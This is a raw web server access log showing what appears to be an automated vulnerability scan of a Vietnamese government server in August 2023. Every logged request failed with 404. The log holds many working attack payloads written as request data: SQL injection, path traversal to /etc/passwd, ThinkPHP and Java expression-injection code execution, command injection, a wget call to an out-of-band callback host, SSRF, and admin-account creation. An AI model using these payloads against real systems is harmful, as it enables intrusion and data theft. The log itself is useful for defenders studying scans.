Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 72 2023-08-03 09:46:56 103.153.214.94 GET /wp-content/plugins/wpcargo/includes/2TSGVXj1VIBWm0K5wEMpYzSmYZ3.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 337 2023-08-03 09:47:05 103.153.214.94 GET /wp-content/plugins/wpcargo/includes/barcode.php text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=2TSGVXj1VIBWm0K5wEMpYzSmYZ3.php 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 55 2023-08-03 09:47:13 103.153.214.94 POST /wp-content/plugins/wpcargo/includes/2TSGVXj1VIBWm0K5wEMpYzSmYZ3.php 1=var_dump 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 74 2023-08-03 09:49:17 103.153.214.94 GET /overview.asp - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 59 2023-08-03 09:49:38 103.153.214.94 GET /s=set&_method=__construct&method=*&filter[]=system - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 400 0 0 85 2023-08-03 09:57:00 103.153.214.94 POST /index.php s=/home/page/uploadImg 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 63 2023-08-03 09:59:20 103.153.214.94 POST /service/extension/backup/mboximport account-name=admin&ow=2&no-switch=1&append=1 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 89 2023-08-03 09:59:28 103.153.214.94 GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 58 2023-08-03 09:59:38 103.153.214.94 POST /service/extension/backup/mboximport account-name=admin&account-status=1&ow=cmd 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 77 2023-08-03 09:59:48 103.153.214.94 GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 139 2023-08-03 10:03:24 103.153.214.94 POST /run - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 97 2023-08-03 10:08:36 103.153.214.94 PATCH /redfish/v1/SessionService/ResetPassword/1/ - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 82 2023-08-03 10:08:44 103.153.214.94 POST /redfish/v1/SessionService/Sessions/ - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 79 2023-08-03 10:13:26 103.153.214.94 GET /wp-admin/admin-ajax.php meta_ids=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&action=remove_post_meta_condition 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 84 2023-08-03 10:20:28 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 57 2023-08-03 10:23:00 103.153.214.94 POST /dfsms/index.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 202 2023-08-03 10:23:06 103.153.214.94 GET /dfsms/add-category.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 105 2023-08-03 10:23:25 103.153.214.94 GET / s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 88 2023-08-03 10:31:46 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 58 2023-08-03 10:33:16 103.153.214.94 POST /adxmlrpc.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 82 2023-08-03 10:33:25 103.153.214.94 GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php 0=id 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 88 2023-08-03 10:36:22 103.153.214.94 GET /web/database/manager - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 85 2023-08-03 10:44:23 103.153.214.94 GET /wavemaker/studioService.download method=getContent&inUrl=file///etc/passwd 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 82 2023-08-03 10:49:53 103.153.214.94 GET /module/smartblog/archive month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 230 2023-08-03 10:51:35 103.153.214.94 GET /2TSGUgx2yo147b0WkTW0PkFjEo3.txt - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 85 2023-08-03 10:51:42 103.153.214.94 PUT /2TSGUgx2yo147b0WkTW0PkFjEo3.txt - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 81 2023-08-03 10:51:47 103.153.214.94 GET /2TSGUgx2yo147b0WkTW0PkFjEo3.txt - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 53 2023-08-03 11:00:49 103.153.214.94 POST /js/jquery_file_upload/server/php/ - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 78 2023-08-03 11:04:10 103.153.214.94 GET /showfile.php file=/etc/passwd 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 63 2023-08-03 11:08:39 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 96 2023-08-03 11:08:44 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 76 2023-08-03 11:08:51 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 101 2023-08-03 11:17:36 103.153.214.94 POST /sysShell - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 59 2023-08-03 11:17:58 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 78 2023-08-03 11:18:17 103.153.214.94 POST /servlet/UploadServlet - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 82 2023-08-03 11:18:27 103.153.214.94 GET /test.txt - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 103 2023-08-03 11:29:30 103.153.214.94 GET /vcac/ - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 78 2023-08-03 11:29:38 103.153.214.94 GET /vcac/ original_uri=https://bcvt.kontum.gov.vn:8172%2Fvcac 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 77 2023-08-03 11:31:17 103.153.214.94 POST /.antproxy.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 123 2023-08-03 11:35:46 103.153.214.94 GET /groovyconsole - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 81 2023-08-03 11:35:53 103.153.214.94 GET /etc/groovyconsole.html - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 76 2023-08-03 11:41:28 103.153.214.94 GET /goanywhere/auth/Login.xhtml - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 77 2023-08-03 11:42:46 103.153.214.94 GET /Schemas/${''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec("id")')} - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 79 2023-08-03 11:47:10 103.153.214.94 GET /admin/suppliers/view_details.php id=1'+AND+(SELECT+9687+FROM+(SELECT(SLEEP(6)))pnac)+AND+'ARHJ'='ARHJ 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 84 2023-08-03 11:54:58 103.153.214.94 GET /server/ - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 101 2023-08-03 11:56:31 103.153.214.94 POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 87 2023-08-03 11:56:41 103.153.214.94 GET /wp-content/plugins/admin-word-count-column/download-csv.php path=../../../../../../../../../../../../etc/passwd\0 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 62 2023-08-03 11:57:14 103.153.214.94 GET /cgi-bin/mesh.cgi page=upgrade&key=;%27wget+http://cj5gsq24749fn87ofdl0f6osw5ihrk5bc.oast.site;%27 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 80 2023-08-03 12:01:56 103.153.214.94 GET /webtools/control/main - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 90 2023-08-03 12:07:14 103.153.214.94 GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo url=https://cj5gsq24749fn87ofdl06jmy4j4xaspcb.oast.site 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 63 2023-08-03 12:09:19 103.153.214.94 GET /tiki-jsplugin.php plugin=x&language=../../../../../../../../../../windows/win.ini 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 71 2023-08-03 12:14:21 103.153.214.94 GET /card_scan.php No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20JqyLmXOSZP.txt%60 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 91 2023-08-03 12:14:30 103.153.214.94 GET /JqyLmXOSZP.txt - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 100 2023-08-03 12:14:56 103.153.214.94 POST /OASREST/v2/authenticate - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 96 2023-08-03 12:23:04 103.153.214.94 GET /account/register - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 82 2023-08-03 12:23:07 103.153.214.94 GET /current_config/passwd - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 79 2023-08-03 12:28:43 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 122 2023-08-03 12:28:51 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 79 2023-08-03 12:33:01 103.153.214.94 GET /login.htm - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 63 2023-08-03 12:33:10 103.153.214.94 GET /formLoginAuth.htm authCode=1&userName=admin&goURL&action=login 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 97 2023-08-03 12:37:17 103.153.214.94 POST /forgot_password.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 58 2023-08-03 12:40:40 103.153.214.94 GET /cgi-bin/weblogin.cgi username=admin';cat+/etc/passwd 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 62 2023-08-03 12:41:04 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 57 2023-08-03 12:41:11 103.153.214.94 GET /wp-content/plugins/infographic-and-list-builder-ilist/assets/js/ilist_custom_admin.js - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 76 2023-08-03 12:50:36 103.153.214.94 GET /index.php fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 66 2023-08-03 12:52:29 103.153.214.94 GET /Admin/Access/Setup/Default.aspx Action=createadministrator&adminusername=B6I2FG&adminpassword=Ne9cBB&adminemail=test@test.com&adminname=test 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 58 2023-08-03 12:56:08 103.153.214.94 GET /csrf - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 66 2023-08-03 12:59:56 103.153.214.94 GET /comment/api/index.php gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(999999999)))),@`%27` 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 89 2023-08-03 13:01:02 103.153.214.94 POST /mgmt/tm/util/bash - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 85 2023-08-03 13:06:31 103.153.214.94 POST /AdminService/urest/v1/LogonResource - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 69 2023-08-03 13:08:09 103.153.214.94 POST /servlet/~ic/bsh.servlet.BshServlet - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 77 2023-08-03 13:08:14 103.153.214.94 POST /servlet/~ic/bsh.servlet.BshServlet - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 78 2023-08-03 13:13:12 103.153.214.94 POST /homeaction.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 86 2023-08-03 13:18:36 103.153.214.94 GET /wp-admin/admin-ajax.php action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 91 2023-08-03 13:20:24 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 66 2023-08-03 13:20:33 103.153.214.94 POST /analytics/telemetry/ph/api/hyper/send _c&_i=test 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 85 2023-08-03 13:27:22 103.153.214.94 POST /Upload/upload_file.php l=test 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 77 2023-08-03 13:27:28 103.153.214.94 GET /Upload/test/2TSGUzPRq2y8UfKdNMeyC7SG7tD.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 74 2023-08-03 13:28:55 103.153.214.94 GET /info.html - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 https://bcvt.kontum.gov.vn:8172/info.html 404 7 0 67 2023-08-03 13:29:31 103.153.214.94 GET / q=./gibbon.sql 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 88 2023-08-03 13:31:39 103.153.214.94 POST /axis2-admin/login - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 58 2023-08-03 13:31:47 103.153.214.94 POST /axis2/axis2-admin/login - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 175 2023-08-03 13:41:02 103.153.214.94 POST /classes/Master.php f=delete_inquiry 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 60 2023-08-03 13:41:56 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 96 2023-08-03 13:42:38 103.153.214.94 GET /widgets/knowledgebase topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 55 2023-08-03 13:47:53 103.153.214.94 GET /devices.inc.php search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 81 2023-08-03 13:52:43 103.153.214.94 POST /configWizard/keyUpload.jsp - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 85 2023-08-03 13:54:07 103.153.214.94 GET /user/scripts/login_par.js - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 88 2023-08-03 13:54:37 103.153.214.94 GET /free_time.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 67 2023-08-03 13:54:46 103.153.214.94 GET /user/City_ajax.aspx CityId=33'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','2TSGVTmPlJy5doKRBaH16TKlTW2')),2-- 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 54 2023-08-03 14:00:22 103.153.214.94 GET /wp-admin/admin-ajax.php action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 84 2023-08-03 14:07:13 103.153.214.94 GET /SAAS/t/_/;/WEB-INF/web.xml - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 98 2023-08-03 14:07:52 103.153.214.94 GET /tool/log/c.php strip_slashes=printf&host=nl+c.php 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 162 2023-08-03 14:08:29 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 152 2023-08-03 14:12:20 103.153.214.94 POST /webtools/control/SOAPService - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 62 2023-08-03 14:14:01 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 